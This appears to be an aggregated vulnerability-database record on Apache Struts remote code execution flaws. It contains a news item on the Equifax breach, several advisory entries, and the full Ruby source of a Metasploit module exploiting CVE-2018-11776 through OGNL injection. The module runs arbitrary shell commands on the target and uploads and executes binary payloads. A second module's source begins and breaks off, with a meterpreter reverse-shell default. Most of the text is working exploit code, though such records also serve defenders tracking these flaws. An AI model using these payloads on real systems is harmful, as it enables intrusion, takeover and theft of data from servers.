population](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>). \n\n\n> \"Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cyber security firm to determine what information was accessed and who have been impacted,\" the company officials wrote in an [update on the website](<https://www.equifaxsecurity2017.com/>) with a new \"A Progress Update for Consumers.\" \n\n> \"We [know that](<https://www.equifaxsecurity2017.com/2017/09/13/progress-update-consumers-4/>) criminals exploited a US website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\"\n\nCVE-2017-5638 was a then-zero-day vulnerability discovered in the [popular Apache Struts](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) web application framework by Cisco's Threat intelligence firm Talos, which observed a number of active attacks exploiting the flaw. \n \nThe issue was a remote code execution bug in the Jakarta Multipart parser of Apache Struts2 that could allow an attacker to execute malicious commands on the server when uploading files based on the parser. \n \nAt the time, Apache warned it was possible to perform a remote code execution attack with \"a malicious Content-Type value,\" and if this value is not valid \"an exception is thrown which is then used to display an error message to a user.\" \n \n**Also Read: **[Steps You Should Follow to Protect Yourself From Equifax Breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) \n \nFor those unaware, Apache Struts is a free, open-source MVC framework for developing web applications in the Java programming language that run both front-end and back-end Web servers. The framework is used by 65n per cent of the Fortune 100 companies, including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS. \n \nSince the hackers are actively exploiting the vulnerabilities in the Apache Struts web framework, Cisco has also [initiated an investigation](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) into its products against four newly discovered security vulnerabilities in Apache Struts2. \n \nOther companies that also incorporate a version of Apache Struts 2 should also check their infrastructures against these vulnerabilities. \n \nEquifax is currently offering free credit-monitoring and identity theft protection services for people who are affected by the massive data leak and has also enabled a security freeze for access to people's information. \n \nWhile the company was initially criticised for generating a PIN that was simply a time and date stamp and easy-to-guess, the PIN generation method was later changed to randomly generate numbers.\n", "cvss3": {}, "published": "2017-09-13T21:38:00", "type": "thn", "title": "Equifax Suffered Data Breach After It Failed to Patch Old Apache Struts Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T10:00:54", "id": "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "href": "https://thehackernews.com/2017/09/equifax-apache-struts.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:27:15", "description": "A remote code execution vulnerability exists in Apache Struts. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-23T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts Remote Code Execution (CVE-2018-11776)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-12T00:00:00", "id": "CPAI-2018-0849", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:33:37", "description": "A remote code execution vulnerability exists in the Apache Struts2 using Jakarta multipart parser. An attacker could exploit this vulnerability by sending an invalid content-disposition as part of a file upload request. Successful exploitation could result in execution of arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-08-09T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts 2 Content-Disposition Remote Code Execution (CVE-2017-5638)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-08-29T00:00:00", "id": "CPAI-2017-0676", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-04T10:32:49", "description": "A remote code execution vulnerability exists in Apache Struts2. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-07T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts2 Content-Type Remote Code Execution (CVE-2017-5638)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2022-09-28T00:00:00", "id": "CPAI-2017-0197", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "Remote command execution vulnerability in Apache Struts 2 multiple tags result namespace handling\n\nVulnerability Type: Remote Command Execution", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-20T00:00:00", "type": "dsquare", "title": "Apache Struts 2 Multiple Tags Result Namespace Handling RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-10-20T00:00:00", "id": "E-666", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-04-09T07:40:57", "description": "This module exploits a remote code execution vulnerability in Apache Struts version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed via an endpoint that makes use of a redirect action. Note that this exploit is dependant on the version of Tomcat running on the target. Versions of Tomcat starting with 7.0.88 currently don't support payloads larger than ~7.5kb. Windows Meterpreter sessions on Tomcat >=7.0.88 are currently not supported. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.\n", "cvss3": {}, "published": "2018-08-31T18:48:22", "type": "metasploit", "title": "Apache Struts 2 Namespace Redirect OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2023-01-27T15:58:53", "id": "MSF:EXPLOIT-MULTI-HTTP-STRUTS2_NAMESPACE_OGNL-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/struts2_namespace_ognl/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n\n # Eschewing CmdStager for now, since the use of '\\' and ';' are killing me\n #include Msf::Exploit::CmdStager # https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html\n\n # NOTE: Debugging code has been stripped, but is available in the commit history: a9e625789175a4c4fdfc7092eedfaf376e4d648e\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Struts 2 Namespace Redirect OGNL Injection',\n 'Description' => %q{\n This module exploits a remote code execution vulnerability in Apache Struts\n version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed\n via an endpoint that makes use of a redirect action.\n\n Note that this exploit is dependant on the version of Tomcat running on\n the target. Versions of Tomcat starting with 7.0.88 currently don't\n support payloads larger than ~7.5kb. Windows Meterpreter sessions on\n Tomcat >=7.0.88 are currently not supported.\n\n Native payloads will be converted to executables and dropped in the\n server's temp dir. If this fails, try a cmd/* payload, which won't\n have to write to the disk.\n },\n 'Author' => [\n 'Man Yue Mo', # Discovery\n 'hook-s3c', # PoC\n 'asoto-r7', # Metasploit module\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2018-11776'],\n ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2018-11776'],\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-057'],\n ['URL', 'https://github.com/hook-s3c/CVE-2018-11776-Python-PoC'],\n ],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Automatic detection', {\n 'Platform' => %w{ unix windows linux },\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\n },\n ],\n [\n 'Windows', {\n 'Platform' => %w{ windows },\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\n },\n ],\n [\n 'Linux', {\n 'Platform' => %w{ unix linux },\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'}\n },\n ],\n ],\n 'DisclosureDate' => '2018-08-22', # Private disclosure = 2018-04-10\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),\n OptString.new('ACTION', [ true, 'A valid endpoint that is configured as a redirect action', 'showcase.action' ]),\n OptBool.new('ENABLE_STATIC', [ true, 'Enable \"allowStaticMethodAccess\" before executing OGNL', true ]),\n ]\n )\n register_advanced_options(\n [\n OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]),\n OptString.new('HEADER', [ true, 'The HTTP header field used to transport the optional payload', \"X-#{rand_text_alpha(4)}\"] ),\n OptString.new('TEMPFILE', [ true, 'The temporary filename written to disk when executing a payload', \"#{rand_text_alpha(8)}\"] ),\n ]\n )\n end\n\n def check\n # METHOD 1: Try to extract the state of hte allowStaticMethodAccess variable\n ognl = \"#_memberAccess['allowStaticMethodAccess']\"\n\n resp = send_struts_request(ognl)\n\n # If vulnerable, the server should return an HTTP 302 (Redirect)\n # and the 'Location' header should contain either 'true' or 'false'\n if resp && resp.headers['Location']\n output = resp.headers['Location']\n vprint_status(\"Redirected to: #{output}\")\n if (output.include? '/true/')\n print_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\")\n datastore['ENABLE_STATIC'] = false\n CheckCode::Vulnerable\n elsif (output.include? '/false/')\n print_status(\"Target requires enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'true'\")\n datastore['ENABLE_STATIC'] = true\n CheckCode::Vulnerable\n else\n CheckCode::Safe\n end\n elsif resp && resp.code==400\n # METHOD 2: Generate two random numbers, ask the target to add them together.\n # If it does, it's vulnerable.\n a = rand(10000)\n b = rand(10000)\n c = a+b\n\n ognl = \"#{a}+#{b}\"\n\n resp = send_struts_request(ognl)\n\n if resp.headers['Location'].include? c.to_s\n vprint_status(\"Redirected to: #{resp.headers['Location']}\")\n print_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\")\n datastore['ENABLE_STATIC'] = false\n CheckCode::Vulnerable\n else\n CheckCode::Safe\n end\n elsif resp.nil?\n fail_with(Failure::Unreachable,\"Target did not respond. Please double check RHOSTS and RPORT\")\n end\n end\n\n def exploit\n case payload.arch.first\n when ARCH_CMD\n resp = execute_command(payload.encoded)\n else\n resp = send_payload()\n end\n end\n\n def encode_ognl(ognl)\n # Check and fail if the command contains the follow bad characters:\n # ';' seems to terminates the OGNL statement\n # '/' causes the target to return an HTTP/400 error\n # '\\' causes the target to return an HTTP/400 error (sometimes?)\n # '\\r' ends the GET request prematurely\n # '\\n' ends the GET request prematurely\n\n bad_chars = %w[; \\\\ \\r \\n] # and maybe '/'\n bad_chars.each do |c|\n if ognl.include? c\n print_error(\"Bad OGNL request: #{ognl}\")\n fail_with(Failure::BadConfig, \"OGNL request cannot contain a '#{c}'\")\n end\n end\n\n # The following list of characters *must* be encoded or ORNL will asplode\n encodable_chars = { \"%\": \"%25\", # Always do this one first. :-)\n \" \": \"%20\",\n \"\\\"\":\"%22\",\n \"#\": \"%23\",\n \"'\": \"%27\",\n \"<\": \"%3c\",\n \">\": \"%3e\",\n \"?\": \"%3f\",\n \"^\": \"%5e\",\n \"`\": \"%60\",\n \"{\": \"%7b\",\n \"|\": \"%7c\",\n \"}\": \"%7d\",\n #\"\\/\":\"%2f\", # Don't do this. Just leave it front-slashes in as normal.\n #\";\": \"%3b\", # Doesn't work. Anyone have a cool idea for a workaround?\n #\"\\\\\":\"%5c\", # Doesn't work. Anyone have a cool idea for a workaround?\n #\"\\\\\":\"%5c%5c\", # Doesn't work. Anyone have a cool idea for a workaround?\n }\n\n encodable_chars.each do |k,v|\n #ognl.gsub!(k,v) # TypeError wrong argument type Symbol (expected Regexp)\n ognl.gsub!(\"#{k}\",\"#{v}\")\n end\n return ognl\n end\n\n def send_struts_request(ognl, payload: nil, headers: nil)\n ognl = \"${#{ognl}}\"\n vprint_status(\"Submitted OGNL: #{ognl}\")\n ognl = encode_ognl(ognl)\n\n if headers.nil?\n headers = {'Keep-Alive': 'timeout=5, max=1000'}\n end\n\n if payload\n vprint_status(\"Embedding payload of #{payload.length} bytes\")\n headers[datastore['HEADER']] = payload\n end\n\n # TODO: Consider embedding OGNL in an HTTP header to hide it from the Tomcat logs\n uri = normalize_uri(target_uri.path, \"/#{ognl}/#{datastore['ACTION']}\")\n\n r = send_request_cgi(\n #'encode' => true, # this fails to encode '\\', which is a problem for me\n 'uri' => uri,\n 'method' => datastore['HTTPMethod'],\n 'headers' => headers\n )\n\n if r && r.code == 404\n fail_with(Failure::UnexpectedReply, \"Server returned HTTP 404, please double check TARGETURI and ACTION options\")\n end\n\n return r\n end\n\n def send_profile\n # Use OGNL to extract properties from the Java environment\n\n properties = { 'os.name': nil, # e.g. 'Linux'\n 'os.arch': nil, # e.g. 'amd64'\n 'os.version': nil, # e.g. '4.4.0-112-generic'\n 'user.name': nil, # e.g. 'root'\n #'user.home': nil, # e.g. '/root' (didn't work in testing)\n 'user.language': nil, # e.g. 'en'\n #'java.io.tmpdir': nil, # e.g. '/usr/local/tomcat/temp' (didn't work in testing)\n }\n\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|('#{rand_text_alpha(2)}')|\n properties.each do |k,v|\n ognl << %Q|+(@java.lang.System@getProperty('#{k}'))+':'|\n end\n ognl = ognl[0...-4]\n\n r = send_struts_request(ognl)\n\n if r.code == 400\n fail_with(Failure::UnexpectedReply, \"Server returned HTTP 400, consider toggling the ENABLE_STATIC option\")\n elsif r.headers['Location']\n # r.headers['Location'] should look like '/bILinux:amd64:4.4.0-112-generic:root:en/help.action'\n # Extract the OGNL output from the Location path, and strip the two random chars\n s = r.headers['Location'].split('/')[1][2..-1]\n\n if s.nil?\n # Since the target didn't respond with an HTTP/400, we know the OGNL code executed.\n # But we didn't get any output, so we can't profile the target. Abort.\n return nil\n end\n\n # Confirm that all fields were returned, and non include extra (:) delimiters\n # If the OGNL fails, we might get a partial result back, in which case, we'll abort.\n if s.count(':') > properties.length\n print_error(\"Failed to profile target. Response from server: #{r.to_s}\")\n fail_with(Failure::UnexpectedReply, \"Target responded with unexpected profiling data\")\n end\n\n # Separate the colon-delimited properties and store in the 'properties' hash\n s = s.split(':')\n i = 0\n properties.each do |k,v|\n properties[k] = s[i]\n i += 1\n end\n\n print_good(\"Target profiled successfully: #{properties[:'os.name']} #{properties[:'os.version']}\" +\n \" #{properties[:'os.arch']}, running as #{properties[:'user.name']}\")\n return properties\n else\n print_error(\"Failed to profile target. Response from server: #{r.to_s}\")\n fail_with(Failure::UnexpectedReply, \"Server did not respond properly to profiling attempt.\")\n end\n end\n\n def profile_os\n # Probe for the target OS and architecture\n begin\n properties = send_profile()\n os = properties[:'os.name'].downcase\n rescue\n vprint_warning(\"Target profiling was unable to determine operating system\")\n os = ''\n os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'\n os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'\n os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'\n end\n return os\n end\n\n def execute_command(cmd_input, opts={})\n # Semicolons appear to be a bad character in OGNL. cmdstager doesn't understand that.\n if cmd_input.include? ';'\n print_warning(\"WARNING: Command contains bad characters: semicolons (;).\")\n end\n\n os = profile_os()\n\n if os && ((os.include? 'linux') || (os.include? 'nix'))\n cmd = \"{'sh','-c','#{cmd_input}'}\"\n elsif os && (os.include? 'win')\n cmd = \"{'cmd.exe','/c','#{cmd_input}'}\"\n else\n vprint_error(\"Failed to detect target OS. Attempting to execute command directly\")\n cmd = cmd_input\n end\n\n # The following OGNL will run arbitrary commands on Windows and Linux\n # targets, as well as returning STDOUT and STDERR. In my testing,\n # on Struts2 in Tomcat 7.0.79, commands timed out after 18-19 seconds.\n\n vprint_status(\"Executing: #{cmd}\")\n\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|(#p=new java.lang.ProcessBuilder(#{cmd})).|\n ognl << %q|(#p.redirectErrorStream(true)).|\n ognl << %q|(#process=#p.start()).|\n ognl << %q|(#r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).|\n ognl << %q|(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#r)).|\n ognl << %q|(#r.flush())|\n\n r = send_struts_request(ognl)\n\n if r && r.code == 200\n print_good(\"Command executed:\\n#{r.body}\")\n elsif r\n if r.body.length == 0\n print_status(\"Payload sent, but no output provided from server.\")\n elsif r.body.length > 0\n print_error(\"Failed to run command. Response from server: #{r.to_s}\")\n end\n end\n end\n\n def send_payload\n data_header = datastore['HEADER']\n if data_header.empty?\n fail_with(Failure::BadConfig, \"HEADER parameter cannot be blank when sending a payload\")\n end\n\n payload = generate_payload_exe\n print_status(\"Generated #{payload.length} byte binary payload\")\n payload_b64 = [payload].pack(\"m\").delete(\"\\n\")\n\n if payload_b64.length < 8100\n send_payload_oneshot(payload_b64)\n else\n send_payload_multishot(payload)\n end\n end\n\n def send_payload_oneshot(payload)\n data_header = datastore['HEADER']\n if data_header.empty?\n fail_with(Failure::BadConfig, \"HEADER parameter cannot be blank when sending a payload\")\n end\n\n random_filename = datastore['TEMPFILE']\n\n # d = payload data\n # f = path to temp file\n # s = stream/handle to temp file\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|(#d=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{data_header}')).|\n ognl << %Q|(#f=@java.io.File@createTempFile('#{random_filename}','.tmp')).|\n ognl << %q|(#f.setExecutable(true)).|\n ognl << %q|(#f.deleteOnExit()).|\n ognl << %q|(#s=new java.io.FileOutputStream(#f)).|\n ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#d)).|\n ognl << %q|(#s.write(#d)).|\n #TODO: Consider GZIP: ognl << %q|(#s.write(java.util.zip.GZIPInputStream(#d).read())).|\n ognl << %q|(#s.close()).|\n ognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).|\n ognl << %q|(#p.start()).|\n ognl << %q|(#f.delete()).|\n\n success_string = rand_text_alpha(4)\n ognl << %Q|('#{success_string}')|\n\n r = send_struts_request(ognl, payload: payload)\n\n if r && r.headers && r.headers['Location'].split('/')[1] == success_string\n print_good(\"Payload successfully dropped and executed.\")\n elsif r && r.headers['Location']\n vprint_error(\"RESPONSE: \" + r.headers['Location'])\n fail_with(Failure::PayloadFailed, \"Target did not successfully execute the request\")\n elsif r && r.code == 400\n fail_with(Failure::UnexpectedReply, \"Target reported an unspecified error while executing the payload\")\n end\n end\n\n def ognl_create_file()\n filename = datastore['TEMPFILE']\n\n # f = path to temp file\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|(#f=@java.io.File@createTempFile('#{filename}','.exe')).|\n ognl << %q|(#f.setExecutable(true)).|\n ognl << %q|(#f.deleteOnExit()).|\n ognl << %q|(#f)|\n\n r = send_struts_request(ognl)\n\n begin\n tempfile = r.headers['Location']\n tempfile = tempfile[1..-(2+datastore['ACTION'].length)]\n if tempfile.empty?\n fail_with(Failure::UnexpectedReply,\"Unable to create and locate file on target. Try a cmd/*/generic payload\")\n end\n rescue\n fail_with(Failure::UnexpectedReply,\"Unable to create and locate file. Try a cmd/*/generic payload\")\n end\n\n return tempfile\n end\n\n def send_payload_multishot(payload)\n tempfile = ognl_create_file()\n print_status(\"Temp file created: #{tempfile}\")\n\n payload_cursor = 0\n\n while payload_cursor < payload.length\n payload_size = rand(4500..5000) # payload_size cannot exceed 5645 in my testing\n payload_start = payload_cursor\n payload_end = payload_cursor + payload_size\n payload_end = payload.size if payload_end > payload.size\n\n chunk_bin = payload[payload_start..payload_end]\n chunk_b64 = [chunk_bin].pack(\"m\").delete(\"\\n\")\n print_status(\"Sending payload chunk: #{chunk_b64.length} bytes\")\n ognl_append_file(tempfile, chunk_b64)\n\n payload_cursor = payload_end + 1\n end\n\n ognl_execute(tempfile)\n end\n\n def ognl_append_file(payload_file, payload_chunk)\n data_header = datastore['HEADER'] + 'd'\n file_header = datastore['HEADER'] + 'f'\n headers = {\n \"#{data_header}\": payload_chunk,\n \"#{file_header}\": payload_file,\n }\n\n # d = payload data\n # f = path to temp file\n # s = stream/handle to temp file\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|(#d=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{data_header}')).|\n ognl << %Q|(#f=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{file_header}')).|\n ognl << %q|(#s=new java.io.FileOutputStream(#f,1)).|\n ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#d)).|\n ognl << %q|(#s.write(#d)).|\n ognl << %q|(#s.close()).|\n\n success_string = rand_text_alpha(4)\n ognl << %Q|('#{success_string}')|\n r = send_struts_request(ognl, headers: headers)\n\n begin\n if r.headers['Location'].include? success_string\n vprint_good(\"OGNL payload chunk sent successfully.\")\n return\n else\n fail_with(Failure::UnexpectedReply, \"OGNL payload upload did not respond\")\n end\n rescue\n fail_with(Failure::UnexpectedReply, \"OGNL payload upload failed\")\n end\n end\n\n def ognl_execute(file)\n file_header = datastore['HEADER'] + 'f'\n headers = {\n \"#{file_header}\": file,\n }\n\n # f = path to temp file\n # p = process handle\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|(#f=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{file_header}')).|\n ognl << %q|(#p=new java.lang.ProcessBuilder(#f)).|\n ognl << %q|(#p.start()).|\n ognl << %q|(#f.delete()).|\n\n success_string = rand_text_alpha(4)\n ognl << %Q|('#{success_string}')|\n r = send_struts_request(ognl, headers: headers)\n\n begin\n if r.code==302\n print_good(\"OGNL payload executed successfully.\")\n else\n fail_with(Failure::PayloadFailed, \"Target did not successfully execute the request\")\n end\n rescue\n vprint_status(\"TARGET RESPONDED: #{r.to_s}\")\n fail_with(Failure::UnexpectedReply, \"Target reported an unspecified error while attempting to execute the payload\")\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/struts2_namespace_ognl.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-03T06:46:29", "description": "The Apache Struts framework, when forced, performs double evaluation of attributes' values assigned to certain tags attributes such as id. It is therefore possible to pass in a value to Struts that will be evaluated again when a tag's attributes are rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE). This vulnerability is application dependant. A server side template must make an affected use of request data to render an HTML tag attribute.\n", "cvss3": {}, "published": "2020-12-16T00:17:35", "type": "metasploit", "title": "Apache Struts 2 Forced Multi OGNL Evaluation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-0230", "CVE-2020-17530"], "modified": "2021-08-27T16:19:43", "id": "MSF:EXPLOIT-MULTI-HTTP-STRUTS2_MULTI_EVAL_OGNL-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/struts2_multi_eval_ognl/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache Struts 2 Forced Multi OGNL Evaluation',\n 'Description' => %q{\n The Apache Struts framework, when forced, performs double evaluation of attributes' values assigned to certain tags\n attributes such as id. It is therefore possible to pass in a value to Struts that will be evaluated again when a\n tag's attributes are rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE).\n\n This vulnerability is application dependant. A server side template must make an affected use of request data to\n render an HTML tag attribute.\n },\n 'Author' => [\n 'Spencer McIntyre', # Metasploit module\n 'Matthias Kaiser', # discovery of CVE-2019-0230\n 'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2020-17530\n 'ka1n4t', # PoC of CVE-2020-17530\n ],\n 'References' => [\n ['CVE', '2019-0230'],\n ['CVE', '2020-17530'],\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-059'],\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-061'],\n ['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-059'],\n ['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-061'],\n ['URL', 'https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2'],\n ['URL', 'https://github.com/ka1n4t/CVE-2020-17530'],\n ],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DisclosureDate' => '2020-09-14', # CVE-2019-0230 NVD publication date\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE, ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ]\n },\n 'DefaultTarget' => 0\n )\n 